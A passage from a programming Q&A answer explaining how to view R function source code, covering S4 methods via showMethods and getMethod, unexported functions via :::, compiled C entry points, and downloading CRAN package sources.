standardGeneric("chol2inv")
<bytecode: 0x000000000eafd790>
<environment: 0x000000000eb06f10>
Methods may be defined for arguments: x
Use  showMethods("chol2inv")  for currently available ones.

The output already offers a lot of information. standardGeneric is an indicator of an S4 function. The way to see defined S4 methods is offered helpfully:

> showMethods(chol2inv)
Function: chol2inv (package base)
x="ANY"
x="CHMfactor"
x="denseMatrix"
x="diagonalMatrix"
x="dtrMatrix"
x="sparseMatrix"

getMethod can be used to see the source code of one of the methods:

> getMethod("chol2inv", "diagonalMatrix")
Method Definition:

function (x, ...) 
{
    chk.s(...)
    tcrossprod(solve(x))
}
<bytecode: 0x000000000ea2cc70>
<environment: namespace:Matrix>

Signatures:
        x
target  "diagonalMatrix"
defined "diagonalMatrix"

There are also methods with more complex signatures, for example:

require(raster)
showMethods(extract)
Function: extract (package raster)
x="Raster", y="data.frame"
x="Raster", y="Extent"
x="Raster", y="matrix"
x="Raster", y="SpatialLines"
x="Raster", y="SpatialPoints"
x="Raster", y="SpatialPolygons"
x="Raster", y="vector"

To see the source code for one of these methods, the entire signature must be supplied, e.g.
getMethod("extract", signature = c(x = "Raster", y = "SpatialPolygons"))

It will not suffice to supply the partial signature:

getMethod("extract", signature = "SpatialPolygons")
#Error in getMethod("extract", signature = "SpatialPolygons") : 
#  No method found for function "extract" and signature SpatialPolygons

In the case of ts.union, .cbindts and .makeNamesTs are unexported functions from the stats namespace. You can view the source code of unexported functions by using the ::: operator or getAnywhere.

> stats:::.makeNamesTs
function (...) 
{
    l <- as.list(substitute(list(...)))[-1L]
    nm <- names(l)
    fixup <- if (is.null(nm)) 
        seq_along(l)
    else nm == ""
    dep <- sapply(l[fixup], function(x) deparse(x)[1L])
    if (is.null(nm)) 
        return(dep)
    if (any(fixup)) 
        nm[fixup] <- dep
    nm
}
<bytecode: 0x38140d0>
<environment: namespace:stats>

Note that "compiled" does not refer to byte-compiled R code as created by the compiler package. The <bytecode: 0x294e410> line in the above output indicates that the function is byte-compiled, and you can still view the source from the R command line.

Functions that call .C, .Call, .Fortran, .External, .Internal, or .Primitive are calling entry points in compiled code, so you will have to look at sources of the compiled code if you want to fully understand the function. This GitHub mirror of the R source code is a decent place to start. The function pryr::show_c_source can be a useful tool, as it will take you directly to a GitHub page for .Internal and .Primitive calls. Packages may use .C, .Call, .Fortran, and .External, but not .Internal or .Primitive, because those are used to call functions built into the R interpreter.

Calls to some of the above functions may use an object instead of a character string to reference the compiled function. In those cases, the object is of class "NativeSymbolInfo", "RegisteredNativeSymbol", or "NativeSymbol"; and printing the object yields useful information.
For example, optim calls .External2(C_optimhess, res$par, fn1, gr1, con) (note that's C_optimhess, not "C_optimhess"). optim is in the stats package, so you can type stats:::C_optimhess to see information about the compiled function being called.

If you want to view compiled code in a package, you will need to download/unpack the package source. The installed binaries are not sufficient. A package's source code is available from the same CRAN (or CRAN-compatible) repository that the package was originally installed from. The download.packages() function can get the package source for you.

download.packages(pkgs = "Matrix", destdir = ".", type = "source")

This will download the source version of the Matrix package and save the corresponding .tar.gz file in the current directory. Source code for compiled functions can be found in the src directory of the uncompressed and untarred file. The uncompressing and untarring step can be done outside of R, or from within R using the untar() function. It is possible to combine the download and expansion steps into a single call (note that only one package at a time can be downloaded and unpacked in this way):

untar(download.packages(pkgs = "Matrix", destdir = ".", type = "source")[,2])

Alternatively, if the package development is hosted publicly (e.g. via GitHub, R-Forge, or RForge.net), you can probably browse the source code tree online; in the R source tree itself, bundled packages live in individual directories under /src/library/. How to access the R source is described in the next section.

If you want to view the code built in to the R interpreter, you will need to download/unpack the R sources; or you can view the sources online via the R Subversion repository or Winston Chang's GitHub mirror. Uwe Ligges's R News article (PDF) (p. 43) is a good general reference for how to view the source code of .Internal and .Primitive functions. The basic steps are to first look for the function name in src/main/names.c and then search for the "C-entry" name in the files in src/main/*.
https://codedump.io/share/pMonTo1sgvL5/1/how-can-i-view-the-source-code-for-a-function